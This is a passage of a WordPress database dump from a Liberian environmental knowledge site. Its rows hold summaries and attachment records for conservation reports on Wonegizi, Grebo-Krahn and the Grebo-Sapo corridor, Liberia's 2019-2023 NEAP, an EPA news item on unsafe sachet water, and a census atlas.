13:46:06','',0,'https://ekmsliberia.info/wp-content/uploads/2020/06/HCV-1-4-Report-Wonegizi-1.pdf',0,'attachment','application/pdf',0),(3079,38,'2020-06-15 14:03:16','2020-06-15 14:03:16','This assessment took place between March and June 2018, beginning with a desk review of data already available for the assessment site. Next, a gap analysis was conducted, and methodologies were developed. This was followed by field work to fill the identified gaps in order the to finalize the HCV assessment. This assessment followed the Liberian national HCV toolkit, developed by Fauna &amp; Flora International and Proforest in 2013, as a reference document to identify HCVs at a national level. This national toolkit follows the interpretations in the HCVRN guidance, and any deviations from these are noted clearly in this assessment.\r\n\r\nThe organisation commissioning this assessment is Fauna &amp; Flora International (FFI) Liberia, lead by Colin Pringle, Senior REDD+ Programme Manager. Contact: +447725594204, colin.pringle@faunaflora.org, The David Attenborough Building, Pembroke Street, Cambridge, UK, CB2 3QZ. Fauna &amp; Flora International was founded in 1903 and was the world’s first international wildlife conservation organization. Its mission is “to conserve threatened species and ecosystems worldwide, choosing solutions that are sustainable, based on sound science, and which take into account human needs”1. It is currently working on over 140 projects in over 40 countries worldwide.\r\n\r\nFFI has started working on REDD+ (Reducing emissions from deforestation and forest degradation) projects in Liberia and Myanmar to create a financial value for the carbon stored in their forests to use towards conservation activities. The REDD+ project in Liberia will provide gazettement of vital conservation habitats and sustainable forest management while integrating community incentives.','High Conservation Value Public Summary  Wonegizi Proposed Protected Area','','publish','closed','closed','','high-conservation-value-public-summary-wonegizi-proposed-protected-area','','','2022-12-06 11:14:02','2022-12-06 11:14:02','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3079',127,'document','',0),(3080,38,'2020-06-15 13:58:15','2020-06-15 13:58:15','High Conservation Value Public Summary \nWonegizi Proposed Protected Area ','HCV 1-4 Report Wonegizi','FFI','inherit','open','closed','','hcv-1-4-report-wonegizi-3','','','2020-06-15 13:58:49','2020-06-15 13:58:49','',3079,'https://ekmsliberia.info/wp-content/uploads/2020/06/HCV-1-4-Report-Wonegizi-2.pdf',0,'attachment','application/pdf',0),(3082,38,'2020-06-15 14:11:48','2020-06-15 14:11:48','LARGE MAMMAL RAPID BIODIVERSITY ASSESSMENT \n \nin the Wonegizi REDD+ Project Site ','NORADLargeMammalSurveyWonegizi','FFI','inherit','open','closed','','noradlargemammalsurveywonegizi','','','2020-06-15 14:12:19','2020-06-15 14:12:19','',0,'https://ekmsliberia.info/wp-content/uploads/2020/06/NORADLargeMammalSurveyWonegizi.pdf',0,'attachment','application/pdf',0),(3083,38,'2020-06-17 12:24:30','2020-06-17 12:24:30','The Wild Chimpanzee Foundation’s mission is to enhance the survival of the remaining wild chimpanzee populations and their habitat, thereby participate in saving the behavioral diversity of this fascinating species. The philosophy of the WCF is threefold: Implement projects of Education, Conservation, and Research for and by the African people\r\n\r\nWCF implements conservation projects in Côte d’Ivoire, Liberia and Guinea. We concentrate our activities in regions were wild chimpanzees are still abundant to ensure their future survival.\r\n','Wild Chimpanzee Foundation','','publish','closed','closed','','wild-chimpanzee-foundation','','','2021-08-17 21:34:26','2021-08-17 21:34:26','',0,'https://ekmsliberia.info/?post_type=institution&#038;p=3083',16,'institution','',0),(3084,38,'2020-06-17 12:08:31','2020-06-17 12:08:31','','WCF','Wild Chimpanzee Foundation','inherit','open','closed','','wcf','','','2020-06-17 12:09:18','2020-06-17 12:09:18','',3083,'https://ekmsliberia.info/wp-content/uploads/2020/06/WCF.jpg',0,'attachment','image/jpeg',0),(3085,38,'2020-06-17 12:25:09','2020-06-17 12:25:09','<p>The Wild Chimpanzee Foundation’s mission is to enhance the survival of the remaining wild chimpanzee populations and their habitat, thereby participate in saving the behavioural diversity of this fascinating species. The philosophy of the WCF is threefold: Implement projects of Education, Conservation, and Research for and by the African people</p><p>WCF implements conservation projects in Côte d’Ivoire, Liberia and Guinea. We concentrate our activities in regions were wild chimpanzees are still abundant to ensure their future survival</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:ffi\" page_length=\"false\"]','Wild Chimpanzee Foundation','','inherit','closed','closed','','3083-revision-v1','','','2020-06-17 12:25:09','2020-06-17 12:25:09','',3083,'https://ekmsliberia.info/3083-revision-v1/',0,'revision','',0),(3086,38,'2020-06-17 12:27:49','2020-06-17 12:27:49','The Wild Chimpanzee Foundation’s mission is to enhance the survival of the remaining wild chimpanzee populations and their habitat, thereby participate in saving the behavioural diversity of this fascinating species. The philosophy of the WCF is threefold: Implement projects of Education, Conservation, and Research for and by the African people\r\n\r\nWCF implements conservation projects in Côte d’Ivoire, Liberia and Guinea. We concentrate our activities in regions were wild chimpanzees are still abundant to ensure their future survival\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:ffi\" page_length=\"false\"]','Wild Chimpanzee Foundation','','inherit','closed','closed','','3083-revision-v1','','','2020-06-17 12:27:49','2020-06-17 12:27:49','',3083,'https://ekmsliberia.info/3083-revision-v1/',0,'revision','',0),(3087,38,'2020-06-18 17:08:35','2020-06-18 17:08:35','The Environmental Protection Agency (EPA) of Liberia contracted Green Consultancy Inc. (Greencons) in 2018 to draft the second State of the Environmental Report (SoER) for Liberia for 2007-2018. A key outcome of the SoER is a National Environmental Action Plan (NEAP), which has been compiled to guide the management of Liberia’s environmental resources for 2019-2023. The following NEAP should therefore be read alongside the SoER (2007-2018), as it contains the data upon which the recommendations in this NEAP are based.\r\n\r\nThe following chapter describes the NEAP process and briefly touches on the methodology which was employed by the specialists to conduct the various assessments upon which the data and recommendations in this plan are based.\r\n\r\nTHE NATIONAL ENVIRONMENTAL ACTION PLAN PROCESS The NEAP is based upon the findings presented in the SoER; the latter which provides an assessment of the status and trends of the environment and its natural resources, and their effect on the wellbeing of the country’s population. Once in every five years, there is a nation-wide study carried out to establish the state of the environment, as well as to develop a five-year NEAP to guide the Government of Liberia (GoL) in managing its environmental resources. The preparation of the SoER and NEAP is largely participatory, drawing knowledge and resources from lead agencies, development partners, research institutions and Civil Society Organisations (CSOs) (amongst others). Although an SoER technical committee is responsible for overall quality control, the preparation of these reports is outsourced to ensure transparency and quality data from environmental specialists.','NATIONAL ENVIRONMENTAL ACTION PLAN (NEAP)  FOR THE REPUBLIC OF LIBERIA     2019-2023','','publish','closed','closed','','https-ekmsliberia-info-wp-content-uploads-2020-06-neap_3-sept-2019-1-9-09-19-1-pdf','','','2021-09-23 11:40:01','2021-09-23 11:40:01','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3087',130,'document','',0),(3088,38,'2020-06-18 17:05:26','2020-06-18 17:05:26','','NEAP_3 Sept 2019 (1) 9-09-19 (1)','NATIONAL ENVIRONMENTAL ACTION PLAN (NEAP)  FOR THE REPUBLIC OF LIBERIA ','inherit','open','closed','','neap_3-sept-2019-1-9-09-19-1','','','2020-06-18 17:05:36','2020-06-18 17:05:36','',3087,'https://ekmsliberia.info/wp-content/uploads/2020/06/NEAP_3-Sept-2019-1-9-09-19-1.pdf',0,'attachment','application/pdf',0),(3090,38,'2020-06-22 13:43:21','2020-06-22 13:43:21','<!-- wp:paragraph -->\n<p>Laboratory research conducted by the Environmental Protection Agency (EPA) on eight water companies has found out that seven of the eight are producing unsafe drinking water for sale to the public and therefore ordered them to shut down until they meet the zero standards of bacteria-free water.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Out of the eight companies, Sunny Aqua, located along the GSA Road, was free of the two categories of pollution tested for, while the rest, including Horoya Pure Mineral Water, WAHCO Purified Mineral Water, Flourish Mineral Water, Romekah Mineral Water, Mekki’s Pure Mineral Water, and Ducor Safe were found with bacteria either associated with feces or others from different sources.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA testing considered the ‘Faecal Coliforms’ and ‘Total Bacteria’ in the research.&nbsp; Faecal Coliform is concerned with pollution caused as a result of having a water facility near a septic tank, about five feet away; while Total Bacteria, as identified in the research, come from different sources with having a water facility near a mangrove swamp inclusive.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Randall M. Dobayou, acting Executive Director of the EPA, addressing representatives of water companies at the agency’s office on Friday, June 19, indicated that the initiative to do a random sampling of water in Monrovia and its environs came because Liberia is in a global village affected by the Coronavirus affecting other countries.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This is important because if a person with the virus has other diseases like diarrhea, the strength of the virus will trigger; for the virus becomes more active in victims with other underlying health problems,” said Dobayou.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dobayou added, “Even besides Coronavirus, we think Liberians deserve safe drinking water.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Regarding companies found to be trading polluted water to the public, the acting EPA Executive Director said “Dirty water is proportionate to a dirty environment.&nbsp; If water is produced and has bacteria, it means the environment is not clean.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also making a PowerPoint presentation of the findings, Rafael Sarji Ngumbu, Supervisor for Environmental Research and Standards Laboratory, noted that the first eight companies on whose product tests were conducted on are among 700 to 900 water companies around the country producing sachet for sale to the public, “but the impression on brands indicating ‘Pure Mineral Water’ is just deceptive because if all companies are tested, only a very few companies will be freed of water pollution,” Ngumbu said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to Ngumbu, the test was done placing water gotten from a sachet of a company in a testing kit of zero bacteria and the result was compared with another kit without a sample of water, and water sample kit and the zero sample kit will be compared to determine the level of bacteria in the water.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Ngumbu further explained Total Bacteria Coliform has sources from the exact area where the water is produced; noting that higher water level near a mangrove swamp facilitates bacteria entering the water while human contact is also a factor.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Representatives of water companies nabbed by the research findings also argued that handing the water over to sellers and then to the end-users could play a part in pollution.  </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Yvonne Boyd, president of the association of water producers in Monrovia, said some sources of water can be polluted by public defecation. According to her, residents near the St. Paul River bank defecate in the river that some companies used as a source.&nbsp; She then appealed to the EPA to turn away from the street sampling collection to go to the water facility to collect the fresh samples so that both parties will have confidence in the results.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Others also argued that shutting down the seven companies would deny the government of tax and more people will lose their jobs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Ngumbu defended the action of EPA to collect samples from the street by stating that if companies were informed, they would have prepared ahead of time to cover their shortcomings.&nbsp; Also, EPA acting Executive Director Randall Dobayou said many individuals will rely on tax payment and job provision to do the wrong thing to strangulate the government from taking actions against wrongs, but for the EPA, it will work in line with its statutory responsibility having to do with working to save the environment for all.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Production of sachet water began in Monrovia right after the civil war ended.&nbsp; It came at the time the Liberia Water &amp; Sewer Corporation (LWSC) lacked the capacity to supply pipe-borne water to the population as equipment was damaged and pipes had rusted away.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There was a high demand for safe drinking water as residents in Monrovia filtered salty water from the sea and rivers to use.&nbsp; This, therefore, made mineral water production a lucrative business that many people have engaged in today.&nbsp; It has also given rise to the production of plastic sachets that people drop all over the streets and in drainages after drinking water from them, thus making the environment filthy and threatening the depletion of soil fertility.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','EPA Research Finds 7 Companies Producing Unsafe Drinking Water','','publish','open','open','','epa-research-finds-7-companies-producing-unsafe-drinking-water','','','2020-08-25 18:57:10','2020-08-25 18:57:10','',0,'https://ekmsliberia.info/?p=3090',193,'post','',0),(3091,38,'2020-06-22 13:43:21','2020-06-22 13:43:21','<!-- wp:paragraph -->\n<p>Laboratory research conducted by the Environmental Protection Agency (EPA) on eight water companies has found out that seven of the eight are producing unsafe drinking water for sale to the public and therefore ordered them to shut down until they meet the zero standards of bacteria-free water.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Out of the eight companies, Sunny Aqua, located along the GSA Road, was free of the two categories of pollution tested for, while the rest, including Horoya Pure Mineral Water, WAHCO Purified Mineral Water, Flourish Mineral Water, Romekah Mineral Water, Mekki’s Pure Mineral Water, and Ducor Safe were found with bacteria either associated with feces or others from different sources.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA testing considered the ‘Faecal Coliforms’ and ‘Total Bacteria’ in the research.&nbsp; Faecal Coliform is concerned with pollution caused as a result of having a water facility near a septic tank, about five feet away; while Total Bacteria, as identified in the research, come from different sources with having a water facility near a mangrove swamp inclusive.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Randall M. Dobayou, acting Executive Director of the EPA, addressing representatives of water companies at the agency’s office on Friday, June 19, indicated that the initiative to do a random sampling of water in Monrovia and its environs came because Liberia is in a global village affected by the Coronavirus affecting other countries.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This is important because if a person with the virus has other diseases like diarrhea, the strength of the virus will trigger; for the virus becomes more active in victims with other underlying health problems,” said Dobayou.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dobayou added, “Even besides Coronavirus, we think Liberians deserve safe drinking water.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Regarding companies found to be trading polluted water to the public, the acting EPA Executive Director said “Dirty water is proportionate to a dirty environment.&nbsp; If water is produced and has bacteria, it means the environment is not clean.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also making a PowerPoint presentation of the findings, Rafael Sarji Ngumbu, Supervisor for Environmental Research and Standards Laboratory, noted that the first eight companies on whose product tests were conducted on are among 700 to 900 water companies around the country producing sachet for sale to the public, “but the impression on brands indicating ‘Pure Mineral Water’ is just deceptive because if all companies are tested, only a very few companies will be freed of water pollution,” Ngumbu said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to Ngumbu, the test was done placing water gotten from a sachet of a company in a testing kit of zero bacteria and the result was compared with another kit without a sample of water, and water sample kit and the zero sample kit will be compared to determine the level of bacteria in the water.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Ngumbu further explained Total Bacteria Coliform has sources from the exact area where the water is produced; noting that higher water level near a mangrove swamp facilitates bacteria entering the water while human contact is also a factor.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Representatives of water companies nabbed by the research findings also argued that handing the water over to sellers and then to the end-users could play a part in pollution.  </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Yvonne Boyd, president of the association of water producers in Monrovia, said some sources of water can be polluted by public defecation. According to her, residents near the St. Paul River bank defecate in the river that some companies used as a source.&nbsp; She then appealed to the EPA to turn away from the street sampling collection to go to the water facility to collect the fresh samples so that both parties will have confidence in the results.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Others also argued that shutting down the seven companies would deny the government of tax and more people will lose their jobs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Ngumbu defended the action of EPA to collect samples from the street by stating that if companies were informed, they would have prepared ahead of time to cover their shortcomings.&nbsp; Also, EPA acting Executive Director Randall Dobayou said many individuals will rely on tax payment and job provision to do the wrong thing to strangulate the government from taking actions against wrongs, but for the EPA, it will work in line with its statutory responsibility having to do with working to save the environment for all.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Production of sachet water began in Monrovia right after the civil war ended.&nbsp; It came at the time the Liberia Water &amp; Sewer Corporation (LWSC) lacked the capacity to supply pipe-borne water to the population as equipment was damaged and pipes had rusted away.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There was a high demand for safe drinking water as residents in Monrovia filtered salty water from the sea and rivers to use.&nbsp; This, therefore, made mineral water production a lucrative business that many people have engaged in today.&nbsp; It has also given rise to the production of plastic sachets that people drop all over the streets and in drainages after drinking water from them, thus making the environment filthy and threatening the depletion of soil fertility.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','EPA Research Finds 7 Companies Producing Unsafe Drinking Water','','inherit','closed','closed','','3090-revision-v1','','','2020-06-22 13:43:21','2020-06-22 13:43:21','',3090,'https://ekmsliberia.info/3090-revision-v1/',0,'revision','',0),(3092,38,'2020-06-22 20:49:52','2020-06-22 20:49:52','A- Generalities and methods of biomonitoring program This report presents results from the biomonitoring program in 2015 in the Proposed GreboKrahn National Park (PGKNP), undertaken by survey team members from the Forestry Development Authority (FDA) and local communities, and with the supervision of the Wild Chimpanzee Foundation (WCF). Data was collected between the 26th February 2015 and the 17th of June 2015. A total of 249.32km of line transects were surveyed across the park, following the same systematic design from 2014. Data was collected on the signs of presence of large mammals, hunting and habitat disturbance (farming, mining, etc.). It was then analysed to determine the current status of wildlife and threats within the proposed park, as well as monitor their population trends.\r\n\r\nB- Abundance and spatial distribution of large mammals in Proposed Grebo-Krahn National Park (PGKNP) Two types of information were recorded: direct observations of large mammals and other animals and their indirect observations (dung, footprints, vocalizations, feeding sites and sleeping nests for chimpanzee...). Data was analysed to determine the encounter rates for each species and the spatial distribution of target species (chimpanzees, monkeys, duikers, etc.). A population estimate of chimpanzees was also calculated and provided the current estimate of 313 individuals. The data supports the idea of a stabilisation of the chimpanzee population as it is within the confidence limits of the 2014 population estimate. Some variation in distribution and encounter rates of other mammals have been documented but a longer time perspective is needed before confirming potential population trends. The isolated patch in the south of the park is an important area for biodiversity and endangered species and signs of wildlife along the Cavalla River have increased since the first phase of biomonitoring.\r\n\r\nC-Threats to wildlife of the PGNP The data collected on anthropogenic activities was treated in the same way as the wildlife data. Results seem do show a marked decrease in hunting activity, but these results must be treated with caution as the Ivorian border has been closed and there has been a ban on bush meat since the Ebola outbreak in Liberia. The expansion of Boley Village is now clearly having a negative effect of the wildlife in the horn in the north of the park. Chewing stick signs were still high within the park, but since the end of data collection law enforcement missions have taken place targeting chewing stick camps within PGKNP.\r\n\r\nD-Conclusion and Recommendations Though PGKNP still harbours high levels of biodiversity and hunting levels have decreased, FDA needs to remain vigilant that hunting pressures do not increase in a post-Ebola environment. The eviction of Boley Village must be a priority as the negative impact of hunting and farming in this settlement is having an effect on the distribution of wildlife in the north of the park. Continuing the process leading to the pre-gazettement of the park is essential in 2016 with activities such as boundary line flagging, community consultations, regional and national level meetings needed before the gazettement package can be submitted.','Biomonitoring in the Proposed Grebo-Krahn National Park REPORT ON PHASE 2','','publish','closed','closed','','biomonitoring-in-the-proposed-grebo-krahn-national-park-report-on-phase-2','','','2021-08-25 11:32:28','2021-08-25 11:32:28','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3092',125,'document','',0),(3093,38,'2020-06-22 20:44:55','2020-06-22 20:44:55','FINAL REPORT: Survey of Wildlife and Anthropogenic threats in the Grebo-Sapo Corridor, South-eastern Liberia','FINAL_REPORT_GS_Corridor_Survey_2015','WCF','inherit','open','closed','','final_report_gs_corridor_survey_2015','','','2020-06-22 20:45:46','2020-06-22 20:45:46','',3092,'https://ekmsliberia.info/wp-content/uploads/2020/06/FINAL_REPORT_GS_Corridor_Survey_2015.pdf',0,'attachment','application/pdf',0),(3094,38,'2020-06-22 20:56:34','2020-06-22 20:56:34','A- Generalities and methods of biomonitoring program This report presents results from the biomonitoring program in 2015 in the Proposed GreboKrahn National Park (PGKNP), undertaken by survey team members from the Forestry Development Authority (FDA) and local communities, and with the supervision of the Wild Chimpanzee Foundation (WCF). Data was collected between the 26th February 2015 and the 17th of June 2015. A total of 249.32km of line transects were surveyed across the park, following the same systematic design from 2014. Data was collected on the signs of presence of large mammals, hunting and habitat disturbance (farming, mining, etc.). It was then analysed to determine the current status of wildlife and threats within the proposed park, as well as monitor their population trends.\n\nB- Abundance and spatial distribution of large mammals in Proposed Grebo-Krahn National Park (PGKNP) Two types of information were recorded: direct observations of large mammals and other animals and their indirect observations (dung, footprints, vocalizations, feeding sites and sleeping nests for chimpanzee...). Data was analysed to determine the encounter rates for each species and the spatial distribution of target species (chimpanzees, monkeys, duikers, etc.). A population estimate of chimpanzees was also calculated and provided the current estimate of 313 individuals. The data supports the idea of a stabilisation of the chimpanzee population as it is within the confidence limits of the 2014 population estimate. Some variation in distribution and encounter rates of other mammals have been documented but a longer time perspective is needed before confirming potential population trends. The isolated patch in the south of the park is an important area for biodiversity and endangered species and signs of wildlife along the Cavalla River have increased since the first phase of biomonitoring.\n\nC-Threats to wildlife of the PGNP The data collected on anthropogenic activities was treated in the same way as the wildlife data. Results seem do show a marked decrease in hunting activity, but these results must be treated with caution as the Ivorian border has been closed and there has been a ban on bush meat since the Ebola outbreak in Liberia. The expansion of Boley Village is now clearly having a negative effect of the wildlife in the horn in the north of the park. Chewing stick signs were still high within the park, but since the end of data collection law enforcement missions have taken place targeting chewing stick camps within PGKNP.\n\nD-Conclusion and Recommendations Though PGKNP still harbours high levels of biodiversity and hunting levels have decreased, FDA needs to remain vigilant that hunting pressures do not increase in a post-Ebola environment. The eviction of Boley Village must be a priority as the negative impact of hunting and farming in this settlement is having an effect on the distribution of wildlife in the north of the park. Continuing the process leading to the pre-gazettement of the park is essential in 2016 with activities such as boundary line flagging, community consultations, regional and national level meetings needed before the gazettement package can be submitted.','Biomonitoring in the Proposed Grebo-Krahn National Park REPORT ON PHASE 2','','inherit','closed','closed','','3092-autosave-v1','','','2020-06-22 20:56:34','2020-06-22 20:56:34','',3092,'https://ekmsliberia.info/3092-autosave-v1/',0,'revision','',0),(3095,38,'2020-06-22 20:57:55','2020-06-22 20:57:55','Biomonitoring in the Proposed Grebo-Krahn National Park ,REPORT ON PHASE 2 ','Biomonitoring_PGKNP_2015_FINAL_REPORT_small','WCF','inherit','open','closed','','biomonitoring_pgknp_2015_final_report_small','','','2020-06-22 20:59:17','2020-06-22 20:59:17','',3092,'https://ekmsliberia.info/wp-content/uploads/2020/06/Biomonitoring_PGKNP_2015_FINAL_REPORT_small.pdf',0,'attachment','application/pdf',0),(3096,38,'2020-06-22 21:17:49','2020-06-22 21:17:49','A- Generalities and Survey Methodology In 2013, a corridor linking Proposed Grebo-Krahn National Park(PGKNP) with the Sapo National Park (SNP) was identified, under the Taï-Grebo-Sapo Transboundary Corridor Initiative, a scheme led by the Governments of Côte d’Ivoire and Liberia. The corridor runs through a major logging concession (FMC ‘F’) and community land (Putu and Chedepo Districts of Grand Gedeh and River Gee counties respectively). To evaluate the feasibility and potential impact of creating the corridor, a survey was led to measure the presence of both wildlife and anthropogenic threats inside the corridor. The survey would also provide a first idea of the potential boundary lines of the corridor. Supervised by trained WCF staff and FDA rangers, 3 teams of trained FDA rangers, auxiliaries and community members walked 103.17 km across two systematic transect designs (1 for the concession, 1 for the community land) between the 28th of May 2015 and the 15th of July 2015. Data was collected on the presence of large mammal and anthropogenic activities. Data was collected following IUCN Standards for Great Ape Surveys (Kühl et al., 2008).\r\n\r\nB- Abundance and spatial distribution of large mammals in the Grebo-Sapo Corridor (GSCor) Data was analysed to determine the encounter rates for each species and the spatial distribution of target species (chimpanzees, monkeys, duikers, etc.). A population estimate of chimpanzees in the survey area of FMC-F was also calculated and provided the current estimate of 688 individuals. Surprising levels of biodiversity were discovered in both FMC-F and the community corridor with signs of 7 species of monkey found in both FMC-F and the community corridor.\r\n\r\nC-Threats to wildlife of the GSCor The data collected on anthropogenic activities was treated in the same way as the wildlife data. Signs of hunting were found in both survey areas at levels which are likely to be having an impact on wildlife in the proposed corridor, higher than in the Proposed Grebo-Krahn National Park. Encounter rates of activities leading to deforestation were surprisingly low for a logging concession and community land, which is a positive result. The largest threat to wildlife in the surveyed areas is hunting activity which fuels the bush meat trade. Note that a large mining camp is located in the FMC F corridor and it appears that the consumption of bushmeat there is extremely high.\r\n\r\nD-Conclusion and Recommendations A corridor between PGKNP and SNP has been presented based on the results of this report. It is vital that all affected stakeholders meet to discuss the boundary lines of the corridor and the management strategies needed to maintain it. Given that the corridor falls in three different types of land-use (National Forest, logging concession and community forest) the creation of a successful corridor will be a complex and delicate process.','FINAL REPORT: Survey of Wildlife and Anthropogenic threats in the Grebo-Sapo Corridor, South-eastern Liberia','','publish','closed','closed','','final-report-survey-of-wildlife-and-anthropogenic-threats-in-the-grebo-sapo-corridor-south-eastern-liberia','','','2021-08-23 10:49:53','2021-08-23 10:49:53','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3096',120,'document','',0),(3097,38,'2020-06-22 21:33:48','2020-06-22 21:33:48','Biomonitoring and law enforcement in the Taï-Grebo-Sapo Forest Complex\r\nIn 2019, a biomonitoring survey focused on the proposed conservation corridor between GreboKrahn National Park (GKNP) and Sapo National Park (SNP) and revealed a high hunting pressure and a possible decrease of the chimpanzee population by 22.5%.\r\nIn Taї National Park (TNP) and GKNP, a new approach of biomonitoring was developed in 2019 and data collection will continue in 2020. This method uses camera traps for TNP, and a combination of line transects and camera traps for GKNP. Preliminary results from TNP identified 71 animal species including 46 mammals. The anti-poaching program in the research and ecotourism area in TNP revealed this year the lowest encounter rate of illegal activities (0.47 signs/km) since 2008, after 12 years of data collection.\r\n\r\nIn 2019, eco-guards pursued data collection in Cavally Classified Forest. The deforestation rate slowed down this year compared to 2017 and 2018. This is positive, but not enough to ensure the preservation of the forest. Additional government efforts are required in 2020 to stop deforestation for the sake of cocoa farming.\r\n\r\nIn 2019, a documentary on WCF’s Independent Forest Monitoring (IFM) on the deforestation issues in the Cavally Classified Forest has been broadcasted in January 2020. The 8th IFM report and analyses of the evolution of the number of offences detected in the Cavally Classified Forest highlight an important decrease in the number of the most frequent offences between 2012 and 2018, demonstrating the importance of independent monitoring. WCF is leading a civil society initiative consisting in developing synergies with actors from the private and public sectors involved in the enforcement of the European Union Timber Regulation (EUTR).\r\n\r\nWCF has participated with a local NGO called NOFNA in several surveys on bush-meat, cocoa trafficking, and corruption. The denunciation of these traffics weakened the illegal activities, because the authorities reacted regularly to these denunciations.\r\n\r\nAwareness raising campaigns in the Taï-Grebo-Sapo Forest Complex\r\nIn 2019, 13,244 persons in Liberia and 18,777 in Côte d’Ivoire assisted the WCF awareness activities in the Taï-Grebo-Sapo Forest Complex, implemented by the eco-guards and Community Watch Teams (CWT). In Côte d’Ivoire, the Taï eco-museum attracted 994 visitors.\r\nWCF initiated a survey in 15 villages neighboring TNP to assess the impact of the theater performances in 2019 on the perception of the local population. 607 people were interviewed and the interviewees who had seen the play said to better understand the role of OIPR and the benefits they have from the park. They were more willing to help protect the park (81.33%), than those who did not see the play (51.65%).','Annual Report 2019  Activities of the Wild Chimpanzee Foundation for improved conservation of chimpanzees and their habitat in West Africa','','publish','closed','closed','','annual-report-2019-activities-of-the-wild-chimpanzee-foundation-for-improved-conservation-of-chimpanzees-and-their-habitat-in-west-africa','','','2021-08-25 11:26:39','2021-08-25 11:26:39','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3097',124,'document','',0),(3098,38,'2020-06-22 21:32:19','2020-06-22 21:32:19','Annual Report 2019 \nActivities of the Wild Chimpanzee Foundation for improved conservation of chimpanzees and their habitat in West Africa \n \n ','2020_WCF-Ann_Rep-2019-final_ENG_24-03-2020','WCF','inherit','open','closed','','2020_wcf-ann_rep-2019-final_eng_24-03-2020','','','2020-06-22 21:32:55','2020-06-22 21:32:55','',3097,'https://ekmsliberia.info/wp-content/uploads/2020/06/2020_WCF-Ann_Rep-2019-final_ENG_24-03-2020.pdf',0,'attachment','application/pdf',0),(3100,38,'2020-06-22 21:50:37','2020-06-22 21:50:37','TECHNOLOGY NEEDS ASSESSMENT REPORT ','tna-agriculture-report-liberia','EPA','inherit','open','closed','','tna-agriculture-report-liberia-2','','','2020-06-22 21:51:03','2020-06-22 21:51:03','',0,'https://ekmsliberia.info/wp-content/uploads/2020/06/tna-agriculture-report-liberia.pdf',0,'attachment','application/pdf',0),(3102,38,'2020-07-15 21:22:52','2020-07-15 21:22:52','A census is the total process of collecting, compiling, evaluating, analyzing and disseminating demographic, economic, social and spatial data pertaining, at a specific\r\ntime, to all persons in a country or a well-delimited part of a country.\r\nThe population and housing census conducted every decade is a complete count of all the people and households in Liberia. The results represent a snapshot of the\r\ndemographic and socio-economic characteristics of the populace of the country, thus enabling planners and policy-makers to measure changes in these\r\ncharacteristics over time. It is also the primary source of information about the number and characteristics of the population in each administrative area. It provides\r\na sampling frame and related functional projections that are necessary for sector planning which affects public expenditure in the areas of education, agriculture and\r\nhealth.\r\nThe census exercise provides information on the number of people living in a particular area as well as information on housing, health, education, employment,\r\nmigration, displacement and disability. The results of the census are important in identifying the extent and nature of social exclusion and resulting service need.\r\nCensus results are vital in supporting local and national government efforts in planning, implementation and monitoring the Millennium Development Goals (MDGs),\r\nInternational Conference on Population and Development (ICPD), Poverty Reduction Strategy (PRS), as well as support of research and business decision-making\r\nprocesses.\r\nThe objective of this atlas is to present the 2008 Liberia Population and Housing Census in an accessible form for a variety of users in the public and private sectors.\r\nThe atlas highlights the similarities and differences in the socio-economic and demographic conditions between the counties of Liberia, using a number of key\r\nvariables in the form of maps, charts and tables. The maps show the spatial distribution of the population and their demographic characteristics within counties with\r\nbrief description of each topic along with corresponding 